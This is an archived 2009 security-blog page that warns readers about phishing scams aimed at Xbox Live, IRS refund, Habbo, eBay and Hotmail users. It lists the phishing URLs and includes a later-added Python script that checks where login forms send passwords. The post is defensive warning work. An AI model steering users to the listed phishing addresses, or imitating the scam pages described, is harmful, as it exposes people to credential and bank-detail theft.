Phish: January 2009 Archives

How Old?

This XBox Live phish attempt caught my eye:

flu0.gif

It's a lot better looking than many of the others I see, and the phisher took the time to make a fake screenshot to impress you with all the fake money he (doesn't) have. The most interesting thing about it for me is that it references another domain ("Runeflux.com"). Usually they're pretty anonymous.

Anyway, I decided to check out the domain. There's nothing there; could it have been taken down? Well, a quick search later and we have this (rather well edited) YouTube video. Apparently the domain simply hosted the same phishing page, so yes, it's a fair bet someone had it taken offline.

The important part is when you check out the profile of the person who owns the account:


flu3.gif

Yes, our phishing friend is only 14. I've had quite a bit of experience researching people at the younger end of the age spectrum involved in this sort of thing, and I have to say the basic mechanics of "how to phish" are all in place with this kid: slick websites, YouTube promotion, little touches like fake screenshots... it's all there.

Worrying, isn't it?

Anyway, the URL to avoid here is

h1.ripway.com/microsoftpointsgen/

There seem to be quite a few sites online at present claiming they can give you "online tax refunds", if only you fill in your bank details and click "submit". It's not a good idea, and they look pretty convincing:


irs1.gif

irs2.gif

Some of these domains have been up and down since last night, but I expect some of them will return again so here they are in full:

gicrisis.org/data/refundtax/SearchTAXERR.php

irs-2009.com/refund/refunds.html

collectrefund-irs.com/refund/refunds.html

cimaonline.ca/application/Internal/Revenue/Service/pas.php?certegy_vm=trueportlet_change_1_actionOverrideFchaseonlineFchangeFprocessDetails_windowLabel_portlet_process_pageLabel_page_process

jklabs.cz/phpayv2/admin/import/.secure/www.irs.gov/get-refund/refunds.php?Where_is_my_refund&Get_Refund

....not really.

fhc1.png

The above is an absolutely hideous phish. Someone clearly needs to hire a real designer from all that stolen Habbo money they must have by now. I think the "Free Habbo Credits" thing was supposed to be clickable (hence the "Proof!" bit), but they seem to have messed that up.

Doh.

The URL to avoid here is

habmanny.tripod.com/id7.html

We've heard reports of a couple of these websites currently doing the rounds - they call themselves "Microsoft Points Heaven", and usually sit on free hosting domains. They promise you "free" Microsoft points, then ask you to enter your Live login details. At that point, your data has been stolen.

mph1.jpg

If you check the code, you can see you're not "signing in to XBox Live" at all - you're entering your information into a standard submission form, which will send the information you enter directly to the site owner.

wfrm.jpg
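
The check described above, as an added example (not code from the original post): a short Python audit that lists where each password-bearing form on a page would actually send its data, including forms that mail it to a mailbox. The sample markup, the `.example` hostnames and the choice of `login.live.com` as the expected sign-in host are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormAudit(HTMLParser):
    """Record each <form> and whether it contains a password field."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open and (a.get("type") or "").lower() == "password":
            self._open["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def credential_targets(html, page_url, expected_host):
    """Return (destination, verdict) for every form that asks for a password."""
    parser = FormAudit()
    parser.feed(html)
    results = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        dest = urljoin(page_url, form["action"])  # empty action posts back to the page
        parts = urlparse(dest)
        if parts.scheme == "mailto":
            verdict = "emailed to a mailbox"
        elif parts.hostname != expected_host:
            verdict = "sent to a host other than " + expected_host
        elif parts.scheme != "https":
            verdict = "sent without TLS"
        else:
            verdict = "ok"
        results.append((dest, verdict))
    return results

# Constructed sample markup and hostnames; not taken from the site in the post.
SAMPLE = """<form action="/search"><input type="text" name="q"></form>
<form method="post" action="http://formmail.example/send.php">
  <input type="text" name="login"><input type="password" name="passwd"></form>
<form action="mailto:collector@mail.example"><input type="password" name="pw"></form>"""

for dest, verdict in credential_targets(SAMPLE, "https://points.freehost.example/", "login.live.com"):
    print(verdict, "->", dest)
```

Any verdict other than "ok" means the password leaves the browser for somewhere other than the sign-in service the page claims to be.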

The last URL we saw this scam residing at was

microsoftpointheaven.weebly.com

which is now offline. It will no doubt resurface somewhere else, so be on your guard...

Wow, this is creepy.

It's an EBay phish page that does two things.

fakeebay1.jpg

The first is that it bizarrely asks you to install a Firefox extension called QIP (as you can see from the yellow bar across the top in the above screenshot), which (as far as I'm aware) is a legitimate Russian extension that allows you to converse with friends across multiple platforms.

fakeebay2.jpg

Call me crazy, but I'm sure most EBay users would immediately think something was wrong if they were presented with a Russian Firefox extension on EBay.

Worse is to come, however. If the end-user should scroll down a little, they're presented with adverts - and they don't exactly convince you that this is the real EBay website. One usually contains a naked woman of some sort. The other? Well, it tends to show a close-up of a randomly selected dead woman's face, often horribly mutilated.

Yes, I have no idea what's going on here either.

ebayfake3.jpg

 
ebayfake4.jpg

Now I've seen a lot of strange things on EBay. Fake laptops, XBox scams, cash on delivery con-jobs and hacktool packs. However, naked women and dead bodies probably take first prize (at least they would if this was the real site). Thanks for freaking me out, insane Russian phisher.

In case you're wondering, the adverts all seem to take you to some kind of Russian linkdump, where none of the images relate to the site you're going to end up at. Russian Roulette is indeed the name of the game where that's concerned.

The site to avoid like the plague here is

sadww.sadas.nm.ru/abasdass.htm

(Automatically translated from Italian):

hhack1.jpg

...sadly, as crude as it is, you'd be surprised how many people will fall for the old "Send your login to a random Hotmail address" gag. The domain to avoid is

habbohack2.blogspot.com

This page is an archive of entries in the Phish category from January 2009.
